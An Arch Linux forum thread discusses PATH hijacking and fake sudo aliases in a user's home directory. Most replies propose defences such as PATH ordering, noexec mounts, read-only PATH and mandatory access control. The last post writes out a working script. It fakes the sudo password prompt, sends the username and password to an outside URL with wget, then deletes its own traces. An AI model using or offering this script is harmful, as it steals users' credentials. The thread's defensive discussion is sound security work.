Arch Linux

Anikom15

Banned

From: United States

Registered: 2009-04-30

Posts: 836

Website

Potential security issue

Ok, so many users have bins in their home folders, or something similar set in their PATH, for scripts and such. Couldn't you place a "clone" of a common UNIX program like cat in their directory? The program would behave the same, but would quitly execute another malicious program to wreak havoc on the machine. Even worse, run it in sudo, and the malware would have access to the whole system. Now I'm not a security person, but this seems very possible.

---

Personally, I'd rather be back in Hobbiton.

tlvb

Member

From: Sweden

Registered: 2008-10-06

Posts: 297

Website

Re: Potential security issue

It should be possible, put an alias in .bashrc for sudo to something that does exactly the same thing as the real deal but on top of that records the password and phones home and you're all set. A way to get around this I would guess, is to keep partitions separate (esp /home, /tmp too I guess), and have all partitions that users have write access to mounted with noexec.

---

I need a sorted list of all random numbers, so that I can retrieve a suitable one later with a binary search instead of having to iterate through the generation process every time.

no-daemon

Member

Registered: 2010-02-13

Posts: 15

Re: Potential security issue

One of the reasons I've never used sudo (this might be the first time I actually type the word), is that such things can happen in theory, and IMHO you won't miss much by removing it.

---

less is a lot more!

szymon_g

Member

Registered: 2008-11-24

Posts: 36

Re: Potential security issue

you can always check which sudo-binary will be used (by typing commend 'which sudo'), not to mention- that if admin really cares about security, he- either- block all possibilities to run a binary from 'improper' locations (/home, /tmp etc) or set a mandatory access control (tomoyo, selinux)- so even if something will run from /home/ it will not broke whole system (and if set up properly, you wont even lose your credit cards details)

Meyithi

Member

From: Wirral, UK

Registered: 2009-06-21

Posts: 550

Website

Re: Potential security issue

If you use Sudo, you shouldn't add users to the wheel group who might be susceptible to run untrusted code, running untrusted code is the real issue.

---

The mind roams more freely in empty rooms.
dwm - colours - ncmpcpp - system
irc://irc.freenode.net:meyithi

bcat

Member

From: New York, NY, USA

Registered: 2009-01-02

Posts: 30

Website

Re: Potential security issue

you can always check which sudo-binary will be used (by typing commend 'which sudo'), not to mention- that if admin really cares about security, he- either- block all possibilities to run a binary from 'improper' locations (/home, /tmp etc) or set a mandatory access control (tomoyo, selinux)- so even if something will run from /home/ it will not broke whole system (and if set up properly, you wont even lose your credit cards details)

"which sudo" doesn't really help much. If I can write code that shadows the sudo executable, I can do the exact same thing for the which executable.

Last edited by bcat (2010-03-07 20:29:15)

---

Running Arch on a Dell Studio 1735. xmonad FTW! Dotfiles here.
Want free cloud-based file sharing? Sign up for Dropbox and we both get some bonus storage!

skanky

Member

From: WAIS

Registered: 2009-10-23

Posts: 1,847

Re: Potential security issue

The recommendation is to add your local bin folder at the *end* of your path, so common apps are picked up first.
If you want to wrap the app then a function will do the job - it can point at a script if necessary.
which has a recommended wrapper function in the man page.

Obviously nothing's water tight, but these things can help.

---

"...one cannot be angry when one looks at a penguin."  - John Ruskin
"Life in general is a bit shit, and so too is the internet. And that's all there is." - scepticisle

Allan

Pacman

From: Brisbane, AU

Registered: 2007-06-09

Posts: 11,488

Website

Re: Potential security issue

Couldn't you place a "clone" of a common UNIX program like cat in their directory?

Someone has managed to get into your computer and place a program in your home's bin directory and you are then worried what it could to....   seems a bit late as the breach has already happened.

---

PGP Key: F99FFE0FEAE999BD | I develop pacman - buy me a drink!

lifeafter2am

Member

From: 127.0.0.1

Registered: 2009-06-10

Posts: 1,332

Re: Potential security issue

Couldn't you place a "clone" of a common UNIX program like cat in their directory?

Someone has managed to get into your computer and place a program in your home's bin directory and you are then worried what it could to....   seems a bit late as the breach has already happened.

This is exactly what I was thinking.  Privilege escalation can be done in hundreds of ways .. if your user account is already broken, you most likely already lost.

---

#binarii @ irc.binarii.net
Matrix Server: https://matrix.binarii.net
-------------
Allan -> ArchBang is not supported because it is stupid.

zowki

Member

From: Trapped in The Matrix

Registered: 2008-11-27

Posts: 582

Website

Re: Potential security issue

If the user's bin directory is appended to the end of the $PATH variable then the malicious executable wont be executed since the real binary will be found first. That's what I as a security practice.

---

How's my programming? Call 1-800-DEV-NULL

JohannesSM64

Member

From: Norway

Registered: 2009-10-11

Posts: 623

Website

Re: Potential security issue

To be safe, use full paths, like /usr/bin/sudo /sbin/fdisk. I don't see why this should be an issue unless someone has access to your user account or the sysadmin is retarded, though.

Last edited by JohannesSM64 (2010-03-08 06:22:53)

knopwob

Member

From: Hannover, Germany

Registered: 2010-01-30

Posts: 239

Website

Re: Potential security issue

if $bad_person has access to someones bin directory, then he has also access to the users .bashrc, where he could define a new $PATH, or he can add something to your .xinitrc and so on.
And since almost no cracker wants to simply destroy your OS, rather than add it to a botnet, run a keylogger or something like this,  there's no real need to have root access anyway.
Oh and if he's running some kind of keylogger: grep su or grep sudo in it's logfile and see what was typed in next.

There are some other ways to compromize your system fairly easily even without changing your $PATH, but i don't want to give bad ideas to someone ;-)

edit: assumed he has access to a useraccount of course, but that's what this thread is about

Last edited by knopwob (2010-03-08 06:38:46)

---

github -- dunst

panuh

Member

From: X :ɯoɹℲ

Registered: 2009-11-24

Posts: 144

Re: Potential security issue

I set my .bashrc to be uneditable (via chattr) and my aliases are loaded through an external file.
After the sourcing of the external file an alias for sudo is set to prevent the named problem.

source ~/.bash_aliases
alias sudo='sudo '

I don't really believe it's necessary but when I first read about this issue I thought this solution is kind of obvious.

Oh... Now I see that I there's another issue for me. I set the alias to 'sudo ', with a space appended, to be able to run aliases via sudo. But that way it's all stupid again XD. But anyway. If you don't use the space I think it should be safe.
Any opinions on that solution?

3ED_0

Member

From: Poland

Registered: 2008-11-03

Posts: 6

Website

Re: Potential security issue

What about if you put "declare -r PATH" under "export PATH" in "/etc/profile" ? :]

-r     Make  names readonly.  These names cannot then be assigned values by
       subsequent assignment statements or unset.

Or maybe "chown root:root", "chmod 755" for "~/.bash_profile", and there declare readonly for PATH.

--EDITED

alias sudo='sudo '

:<
"declare -x -r sudo='/usr/bin/sudo'" and then: "$sudo" in terminal
or add realiasing to viariable PROMPT_COMMAND (declared as readonly)

BTW. Good for feature reqest in bash: alias -r (readonly)

Last edited by 3ED_0 (2010-11-30 01:50:00)

dyscoria

Member

Registered: 2008-01-10

Posts: 1,007

Re: Potential security issue

I mount my /home /var and /tmp all noexec (and run TOMOYO Linux) and problem solved But of couse that doesn't stop the local attacker from booting from USB/CDROM and doing what they like. And if booting from media is disabled, they can just remove the hard drive, put in enclosure and mount as external HDD. So I guess we have to encrypt data, but risk losing everything if system crashes or power fails so we have to make frequent backups (which I guess must also be encrypted).

Easy solution: don't let people near your computer

Last edited by dyscoria (2010-11-30 06:56:24)

---

flack 2.0.6: menu-driven BASH script to easily tag FLAC files (AUR)
knock-once 1.2: BASH script to easily create/send one-time sequences for knockd (forum/AUR)

Fruity

Member

Registered: 2009-12-16

Posts: 198

Re: Potential security issue

Isnt this a bit like leaving your keys in the car, then wondering how it was stolen?

Tomoyo linux + noexec, fine ideas! Must read more about tomoyo though! *adds them to the to do list*

3ED_0

Member

From: Poland

Registered: 2008-11-03

Posts: 6

Website

Re: Potential security issue

With noexec?

alias sudo='bash ~/script' added to your .basrrc

# ~/script look like
printf "Password: "
read pass
wget --post-data "ip=$ip&user=`id -un`&pass=$pass" http://php.ar/john/php.php &> /dev/null
sed 's/alias sudo=.*//g' -i .bashrc &> /dev/null
(sleep 3; rm ~/script &> /dev/null) &
printf "Try again..\n"
sudo "$@"

or something like that.

I know - TOMOYO, but this also no 100% armored us. :]

Last edited by 3ED_0 (2010-11-30 12:52:55)